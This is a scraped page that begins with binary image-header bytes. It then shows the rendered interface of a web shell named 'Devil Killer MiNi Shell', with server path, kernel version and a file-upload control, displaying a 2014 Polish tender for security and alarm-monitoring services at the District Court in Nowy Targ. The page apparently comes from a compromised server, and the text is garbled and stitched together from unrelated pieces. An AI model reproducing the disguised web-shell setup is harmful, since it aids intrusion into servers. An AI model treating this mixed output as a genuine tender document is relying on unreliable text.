JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141002/327294-N-2014.html

<p class="kh_header"><b>Nowy Targ: Ochrona wraz z monitoringiem
 obiektów, osób i mienia 
 Sądu Rejonowego w Nowym Targu</b><br>
<b>Numer ogłoszenia: 327294 - 2014; data zamieszczenia: 02.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Nowym Targu , ul. Ludźmierska 29, 34-400 Nowy Targ, woj. małopolskie, tel. 0-18 2612612, faks 0-18 2612612.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona wraz z monitoringiem
 obiektów, osób i mienia 
 Sądu Rejonowego w Nowym Targu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: ochrona wraz z monitoringiem obiektów, osób i mienia   Sądu Rejonowego w Nowym Targu ul. Ludźmierska 29                        Konserwacja i naprawy systemów alarmowych  zainstalowanych w Sądzie Rejonowym w Nowym Targu ul. Ludźmierska 29
                                                       
    Parametry obiektów:
      
            Budynek I

 Powierzchnia zabudowy     911,98 m2 
            Powierzchnia całkowita   2 677,64 m2
            Kubatura budynku           8 171,00 m3
            Liczba kondygnacji naziemnych    3
            
Budynek II
            Powierzchnia zabudowy     1 574,62 m2 
            Powierzchnia całkowita      4 192,39 m2
            Kubatura budynku             15 147,26 m3
            Liczba kondygnacji naziemnych    3 w północnej części budynku
                                                         2 w południowej części budynku

  Usługa ochrony polegać ma na działaniu mającym na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej oraz działaniu zapobiegającym przestępstwom  i wykroczeniom przeciwko mieniu, a także przeciwdziałaniu powstaniu szkody wynikającej z tych zdarzeń oraz niedopuszczeniu do wstępu osób nieuprawnionych na teren chroniony.
  
        Zakres rzeczowy usługi:

   1. Fizyczna ochrona 2-ch budynków Sądu Rejonowego w Nowym Targu  
       położonych przy ul. Ludźmierskiej 29 (część I-go budynku jest zajmowana 
       przez Prokuraturę Rejonową w Nowym Targu, lecz ochroną ma być objęty  
       cały budynek) realizowana przez  pracowników ochrony w tym Szefa  
       ochrony:
        
        W poniedziałek (w dni robocze) każdego tygodnia w godz.
        od 7.00 do   7.30 - dwóch pracowników ochrony 
        od 7.30 do 15.30 - czterech  pracowników ochrony
        od 15.30 do 18.00 - dwóch pracowników ochrony

       Od wtorku do piątku (w dni robocze) każdego tygodnia w godz.:
       
       od   7.00 do   7.30 - dwóch pracowników ochrony  
       od   7.30 do 15.30 - czterech pracowników ochrony
       od 15.30 do 16.00 - dwóch pracowników ochrony

       w  pozostałym czasie tj. w poniedziałki (w dni robocze) od godz. 18.00 do 
       7,00 dnia następnego, w pozostałe dni robocze od godz. 16.00 do 7.00 dnia 
       następnego oraz w dni wolne od pracy ( w tym święta) - 1 pracownik ochrony      

            W razie konieczności Wykonawca zapewni wsparcie pracowników ochrony 
            przez grupę  interwencyjną.


        Szef ochrony - wymagany wpis na listę kwalifikowanych pracowników  ochrony fizycznej (zgodnie z Ustawą z dnia 22.08.1997r. o ochronie osób i  
                                 mienia)
        Pracownicy ochrony - wymagany wpis na listę kwalifikowanych pracowników  ochrony fizycznej (zgodnie z Ustawą z dnia 22.08.1997r. o ochronie  osób i  mienia)

   Ochrona osób i mienia Sądu ma być wykonywana przez pracowników 
   zatrudnionych przez Wykonawcę  na podstawie umowy o pracę na   
   czas nie krótszy niż okres wykonywania umowy.  Zamawiający nie dopuści do 
   sprawowania ochrony  innych osób niż pracownicy Wykonawcy. (nie może być 
   umowa cywilno-prawna)
               Pracownicy ochrony mają spełniać następujące wymagania: 
   - posiadają wymagane    uprawnienia  , 
   - są przeszkoleni w zakresie udzielania pierwszej pomocy  i posiadają czynną 
     umiejętność jej udzielania                                                                                                
         - znają przepisy o ochronie osób i mienia
         - charakteryzują się wysoką kulturą osobistą
         - radzą sobie z rozwiązywaniem sytuacji konfliktowych 
         - nie były karane
         - nie ulegają nałogom (w szczególności nie są uzależnione od alkoholu lub środków  odurzających) 
         - posiadają podstawową wiedzę techniczną w zakresie obsługi wykrywaczy metalu,  systemów alarmowych  i systemów kamer przemysłowych
         - posiadają sprawność psychofizyczną umożliwiającą podjęcie działań 
           interwencyjnych (w granicach uprawnień ochrony) w przypadku wystąpienia stanu  zagrożenia życia lub zdrowia albo uszkodzenia mienia

          Ponadto Wykonawca jest zobowiązany zapewnić nadzór nad ekipą ochraniającą  budynki Sądu oraz będzie sprawował kontrolę nad wykonywaniem ochrony Sądu   również poprzez dokonywanie kontroli pracowników w różnych porach (także  nocnych).   Przeprowadzenie takich kontroli ma być odnotowane w książce wydarzeń.

      Szczegółowy zakres obowiązków szefa ochrony:

1/  Koordynowanie i nadzorowanie pracy pracowników ochrony
2/  Dokonywanie odpraw przed rozpoczęciem ochrony   
3/  Organizacja służb dla poszczególnych pracowników ochrony w celu 
     zapewnienia bezpiecznego i sprawnego funkcjonowania Sądu Rejonowego 
     w Nowym Targu i Prokuratury Rejonowej w Nowym Targu w tym 
     zapewnienia dostępu do budynku upoważnionych pracowników Sądu 
     Rejonowego i Prokuratury Rejonowej poza godzinami pracy 
4/  Kontrola wykonywania zadań przez pracowników ochrony w tym kontrola 
     wykonywanych obchodów wewnątrz obiektów 
5/  Ciągła obserwacja obrazu z urządzeń monitorujących obiekty i ich 
     otoczenie, przyjmowanie sygnałów napadu, włamania, pożaru                                        
     i  podejmowanie działań adekwatnych do zagrożenia życia, zdrowia lub 
      mienia,
6/   Podejmowanie i organizowanie działań w przypadku zakłócenia porządku  
      publicznego w chronionych obiektach w tym wzywanie grupy 
      interwencyjnej w sytuacji tego wymagającej,
7/   Przyjmowanie poleceń Zamawiającego lub upoważnionej osoby , jeśli  
      mieszczą się w zakresie prac ochronnych i nie kolidują z przepisami prawa 
      oraz nie wpływają ujemnie na stan bezpieczeństwa chronionych obiektów,
8/   Prowadzenie książki wydarzeń.


       Szczegółowy zakres obowiązków pracowników ochrony:

1/   Otwarcie budynków Sądu przez pracowników ochrony pełniących służbę            
      o godz. 7.00 w dzień roboczy  w celu umożliwienia pracownikom wejścia 
      do budynków.
2/   Sprawdzenie w czasie rozpoczęcia służby ochronnej obiektów pod 
      względem zabezpieczenia technicznego,
3/   Wydawanie, przyjmowanie i przechowywanie kluczy do pomieszczeń  
      Zamawiającego oraz prowadzenie odpowiedniej ewidencji, 
4/   Kontrola osób wchodzących do budynków Sądu pod względem zasadności  
      wejścia na teren obiektu. Jeśli będą tego wymagały wprowadzone 
      przepisy, również sprawdzanie dokumentów stwierdzających tożsamość         
     osoby wchodzącej do Sądu. Sprawdzanie osób i bagaży pod względem 
      wnoszenia na teren obiektów: broni, amunicji, ładunków wybuchowych, 
      materiałów pirotechnicznych, niebezpiecznych przedmiotów itp.,
5/   Reagowanie na zakłócanie porządku publicznego,
6/   Dokonywanie przynajmniej cogodzinnych obchodów na poszczególnych 
      kondygnacjach budynków, a w dniach o zwiększonej ilości rozpraw  -  
      częstszych stosownie do potrzeb
7/    Wykonywanie innych czynności mających na celu zapewnienie  
      bezpiecznego funkcjonowania Sądu ,
8/   Pomoc osobom niepełnosprawnym wchodzącym do budynku,  
      poruszającym się po korytarzach itp.,
9/   Pod koniec służby dokonywanie dokładnego sprawdzenia wszystkich 
      dostępnych pomieszczeń pod względem opuszczenia obiektów przez 
      osoby obce oraz pozostawionych przedmiotów niewiadomego 
      pochodzenia. Sprawdzenie stanu zabezpieczenia technicznego,
10/ Prowadzenie ewidencji pracowników pozostających w obiektach poza 
      godzinami i dniami urzędowania 
11/ Pracownik ochrony pełniący służbę po godzinach pracy Sądu oraz             
      w dni wolne od pracy i święta jest zobowiązany umożliwić upoważnionym 
      pracownikom Sądu i Prokuratury wejście do budynku w celu wykonywania 
      czynności służbowych,
12/ Pracownik ochrony pełniący służbę po godzinach pracy Sądu oraz                 
      w dni wolne od pracy jest zobowiązany do obserwacji obrazu                      
      z urządzeń monitorujących obiekty i ich otoczenie, przyjmowania sygnałów  
      włamania, pożaru i podejmowanie działań adekwatnych do zagrożenia
13/Pracownicy ochrony są zobowiązani również do zgłaszania Zamawiającemu 
     zauważone  uszkodzenia i awarie : sieci c.o. (w tym kotłów co), sieci wodociągowo 
     -  kanalizacyjnej, wyposażenia węzłów sanitarnych, sprzętu biurowego, instalacji 
    alarmowej, instalacji telewizji dozorowej i innych.

14/ pracownik ochrony pełniący służbę o godz. 18,00 w poniedziałki (dni 
      robocze) oraz o godz. 16.00 w pozostałe dni robocze zamyka budynki    
      Sądu po wyjściu pracowników i dozoruje budynki w sposób umożliwiający  
      osobom i służbom sprzątającym wykonanie powierzonych im czynności.

           Dodatkowe warunki stawiane przez Zamawiającego :

-   Wykonawca  dołoży starań w celu utrzymywania stałej ekipy ochraniającej budynki  Sądu  - każdorazowo wprowadzenie zmian składu osobowego ekipy 
     ochroniarskiej Wykonawca uzgodni z Zamawiającym, 
  -    Pracownicy  wykonujący ochronę budynków sądu winni  być ubrani w stroje typu  garnitur (odstępstwo od tej zasady będzie podlegało uzgodnieniu                 
z Zamawiającym), winni posiadać identyfikatory ze zdjęciem oraz posiadać sprzęt do komunikowania się między sobą, z odpowiednimi służbami oraz z Zamawiającym ( krótkofalówki, tel. komórkowe).
-	ze względu na specyfikę spraw, jakimi zajmuje się Zamawiający, Wykonawca  przedstawi - przed podpisaniem umowy -  poświadczenia o niekaralności  pracowników, którzy będą  ochraniać budynki Sądu,
-	Wykonawca zobowiązuje się do przedstawienia Zamawiającemu kopii umów o pracę zawartych  z pracownikami ochrony, którzy będą ochraniać budynki Sądu   
-	Wykonawca - oprócz ekipy ochroniarskiej - zapewni wsparcie grup interwencyjnych w sytuacjach tego wymagających

      2.  Monitoring systemu sygnalizacji pożaru zainstalowanego w 2-ch budynkach Sądu   Rejonowego w Nowym Targu  poprzez:
         - podłączenie istniejącego lokalnego systemu alarmowego do systemu dyskretnego   ostrzegania  z zapewnieniem dojazdu grupy interwencyjno-patrolowej w czasie max. 10-ciu minut od momentu otrzymania sygnału o uruchomieniu alarmu. Stacja    monitorowania Wykonawcy musi spełniać warunki podłączenia drogą radiową lub  GPRS  i telefoniczną sytemu alarmowego Zamawiającego do urządzeń odbiorczych   
           Wykonawcy oraz musi pozwalać na natychmiastową weryfikację sygnału alarmowego  tj. określenie rodzaju i  miejsca alarmu oraz niezwłoczne skierowanie do budynku  grupy interwencyjno-patrolowej. Zamontowane przez Wykonawcę urządzenie  monitorujące pozostanie  własnością Wykonawcy i będzie mu  wydane po  zakończeniu umowy
          - monitorowanie  przez Wykonawcę lokalnego systemu sygnalizacji pożaru 
            w  budynkach Sądu  - przyjmowanie informacji o alarmie a po weryfikacji 
            powiadomienie Jednostki Ratowniczo-Gaśniczej PSP w Nowym Targu oraz osób  wskazanych przez  Zamawiającego
    
3.	Monitoring systemu sygnalizacji włamania i napadu zainstalowanego w 2-ch budynkach   Sądu Rejonowego w Nowym Targu  poprzez:
             - podłączenie istniejącego lokalnego systemu alarmowego do systemu dyskretnego  ostrzegania  z zapewnieniem dojazdu grupy interwencyjno-patrolowej w czasie   max. 10-ciu minut od momentu otrzymania sygnału o uruchomieniu alarmu. Stacja  monitorowania Wykonawcy musi spełniać warunki podłączenia drogą radiową lub GPRS i telefoniczną sytemu alarmowego Zamawiającego do urządzeń odbiorczych 
      Wykonawcy oraz musi pozwalać na natychmiastową weryfikację sygnału 
     alarmowego tj. określenie rodzaju i miejsca alarmu oraz niezwłoczne skierowanie do  budynku grupy interwencyjno-patrolowej. Zamontowane przez Wykonawcę 
     urządzenie monitorujące pozostanie własnością Wykonawcy i będzie mu  wydane po  zakończeniu umowy
            - monitorowanie  przez Wykonawcę lokalnego systemu alarmowego w budynkach   Sądu  - przyjmowanie informacji o alarmie,  a po weryfikacji powiadomienie osób  wskazanych przez Zamawiającego i odpowiednich służb . W razie potrzeby   zabezpieczy obiekt do czasu przybycia osób upoważnionych lub odpowiednich służb.  

      Wykonawca zobowiązany jest do posiadania minimum dwóch własnych, dwuosobowych  grup interwencyjno-patrolowych zdolnych dojechać do siedziby Zamawiającego we  wskazanym czasie.

4.	Wykonywanie bieżącej konserwacji i usuwanie awarii instalacji telewizji przemysłowej (CCTV) w budynkach Sądu Rejonowego w Nowym Targu (komputer z kartą VTV) obejmującej przegląd urządzeń monitoringu wizyjnego wraz z usunięciem usterek w zakresie:
- poprawności działania kamer, rejestratora obrazu, monitorów
- sprawdzenia stanu technicznego połączeń giętkich
- sprawdzenia zasilania systemu
- czyszczenia obiektywów kamer
- korekty   ustawień kamer
- wykonywania drobnych napraw systemu
Konserwacja ma być wykonana min. 2-krotnie w czasie trwania umowy tj. w styczniu 2015r. i w lipcu 2015r.
Po wykonaniu konserwacji systemu Wykonawca sporządzi odpowiedni protokół i przedstawi go Zamawiającemu.
W razie awarii systemu Wykonawca zobowiązany jest przystąpić do jej usunięcia                   w ciągu 24 godzin od powiadomienia o awarii.
Jeżeli zaistnieje konieczność wykonania prac naprawczych wymagających wymiany czy dołożenia urządzeń lub zużycia materiałów instalacyjnych , prace te będą         
 wyceniane odrębnie na podstawie szczegółowego kosztorysu i rozliczane poza niniejszą umową.
       
       Pracownicy wykonujący konserwacje i naprawy  - wymagany wpis na listę 
                                 kwalifikowanych pracowników zabezpieczenia technicznego (zgodnie z Ustawą z dnia 22.08.1997r. o ochronie osób i  mienia)

5.	Wykonywanie bieżącej konserwacji i usuwanie awarii  systemu sygnalizacji włamania i napadu zainstalowanego w budynkach Sądu Rejonowego w Nowym Targu (centrale DSC PC-4020) w zakresie:
-  poprawności   działania przycisków napadowych, czujników (czystość, pola 
   pokrycia) , obwodów sabotażowych, urządzeń bezprzewodowych (w tym baterii  
   nadajników)
- sprawdzenia stanu technicznego centrali (zaciski na listwie połączeniowej, reakcja 
  na zanik napięcia, stan akumulatora)
- sprawdzenia prawidłowości zapisu w pamięci centrali definicji linii, czasu 
  opóźnienia, czasu sygnalizacji akustyczno-optycznej
- sprawdzenia wszystkich urządzeń pod względem estetyki i stanu mocowania
- sprawdzenie zgodności komunikatów odbieranych przez stację monitorującą                       
  z  sygnałami wysyłanymi
 Konserwacja ma być wykonana min. 2-krotnie w czasie trwania umowy tj. w styczniu   
 2015r. i w lipcu 2015r.
Po wykonaniu konserwacji systemu Wykonawca sporządzi odpowiedni protokół i przedstawi go Zamawiającemu.
  W razie awarii systemu Wykonawca zobowiązany jest przystąpić do jej usunięcia       w ciągu 24 godzin od powiadomienia o awarii.
             Jeżeli zaistnieje konieczność wykonania prac naprawczych wymagających wymiany  czy dołożenia urządzeń lub zużycia materiałów instalacyjnych , prace te będą   wyceniane odrębnie na podstawie szczegółowego kosztorysu i rozliczane poza  niniejszą umową.
       
       Pracownicy wykonujący konserwacje i naprawy  - wymagany wpis na listę 
                                 kwalifikowanych pracowników zabezpieczenia technicznego  (zgodnie z Ustawą z dnia 22.08.1997r. o ochronie osób i  mienia)

6.	Wykonywanie bieżącej konserwacji i usuwanie awarii  systemu sygnalizacji pożaru oraz systemu oddymiania zainstalowanego w budynkach Sądu Rejonowego 
w Nowym Targu (centrale Sagitta-250)  w zakresie:
- sprawdzenia poprawności zadziałania każdej czujki i ręcznego ostrzegacza  
  pożarowego zgodnie z zaleceniami producenta
- sprawdzenia czy centrala sygnalizacji pożarowej prawidłowo odbiera i wyświetla 
  określone sygnały, emituje alarm akustyczny oraz uaktywnia wszystkie inne 
  urządzenia ostrzegawcze i pomocnicze,
- sprawdzenia poprawności zaprogramowanych czasów w centrali sygnalizacji 
  pożarowej
- sprawdzenia i konserwacji wszystkich styków w centrali sygnalizacji 
  pożarowej
- sprawdzenie poprawności komunikatów w bazie odbiorczej wysyłanych z centrali 
  pożarowej przez nadajnik monitoringu pożarowego 
- sprawdzenie czy wszystkie połączenia kablowe i sprzęt są sprawne, nie 
  uszkodzone i odpowiednio zabezpieczone oraz czy pod każdą czujką jest 
  utrzymana wolna przestrzeń (co najmniej 0,5 m we wszystkich kierunkach)
- przegląd centrali oddymiania wraz z ręcznymi ostrzegaczami pożaru i przyciskami 
  przewietrzania , konserwacja styków w centrali oddymiania, sprawdzenie 
  siłowników i klap oddymiania                                                                                
Konserwacja ma być wykonana min. 2-krotnie w czasie trwania umowy tj. w styczniu 2015r. i w lipcu 2015r.

Po wykonaniu konserwacji systemu Wykonawca sporządzi odpowiedni protokół i przedstawi go Zamawiającemu.
W razie awarii systemu Wykonawca zobowiązany jest przystąpić do jej usunięcia     w ciągu 24 godzin od powiadomienia o awarii.
Jeżeli zaistnieje konieczność wykonania prac naprawczych wymagających wymiany czy dołożenia urządzeń lub zużycia materiałów instalacyjnych , prace te będą wyceniane odrębnie na podstawie szczegółowego kosztorysu i rozliczane poza niniejszą umową.

       Pracownicy wykonujący konserwacje i naprawy  - wymagany wpis na listę 
                                 kwalifikowanych pracowników zabezpieczenia technicznego   (zgodnie z Ustawą z dnia 22.08.1997r. o ochronie osób i  mienia)

7.	Świadczenie usługi transportu wartości pieniężnych nie przekraczających 1 jednostki obliczeniowej do banków obsługujących Zamawiającego i bezpiecznego przewozu kasjera z siedziby Sądu Rejonowego w Nowym Targu  do banków obsługujących Zamawiającego (zlokalizowanych w Nowym Targu - odległość do 5 km)  i z powrotem. 
Ilość transportów wartości pieniężnych w m-cu wynosi:
- do banku realizującego zastępczą obsługę kasową NBP - w każdym dniu 
  roboczym
- do banku realizującego zastępczą obsługę kasową BGK - średnio 15 razy w m-cu

Pobieranie pakietów z gotówką z siedziby Zamawiającego ma być wykonywane przez pracowników ochrony wskazanych przez Wykonawcę zgodnie ze sporządzonym  wykazem i będzie następować bez sprawdzenia zawartości pakietu.

Wykonawca ponosi pełną odpowiedzialność za straty powstałe w trakcie świadczenia usługi przewozu wartości pieniężnych.

Ilość przewozów kasjera :
-  do banku realizującego zastępczą obsługę kasową NBP i z powrotem - średnio              
   3 razy w m-cu
-  do banku prowadzącego dystrybucję znaków opłaty sądowej - średnio 1 raz                      
   w m-cu
Termin bezpiecznego przewozu kasjera do banku i z powrotem jest zgłaszany przez pracownika Zamawiającego z 1-dniowym wyprzedzeniem.

Lokalizacja banków oraz godziny transportów zostaną określone w zał. nr 1 do Umowy.

Usługa ma być świadczona przy wykorzystaniu kierowcy-inkasenta, uzbrojonego konwojenta oraz pojazdu przystosowanego do przewozu wartości pieniężnych i na zasadach zgodnych z Rozp. MSWiA z dnia 07.09.2010r. w sprawie  wymagań jakim powinna odpowiadać ochrona wartości pieniężnych przechowywanych 
i transportowanych przez przedsiębiorców i inne jednostki organizacyjne.

Wykonawca ma posiadać ubezpieczenie wartości pieniężnych w transporcie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 50.80.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o wartości 7 000,00 zł. 
2. Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo      
    - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych, 
4) gwarancjach ubezpieczeniowych, 
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy            z dnia 9 listopada 2000 r. o utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości                 (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.)

3. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy 
    Zamawiającego: BGK Oddział Kraków nr - 27 1130 1150 0012 1235 7790 0001 .             

Kserokopię wpłaty/przelewu należy dołączyć do oferty. 
4. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.
6. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, tj.                  do dnia 10.10.2014r. do godz.10:00. 
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
7. Wniesione wadium musi obejmować okres związania ofertą.
8. Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną przez zamawiającego formą wadium zostanie przez zamawiającego wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.

Zwrot oraz utratę wadium określa art. 46  ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów, na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
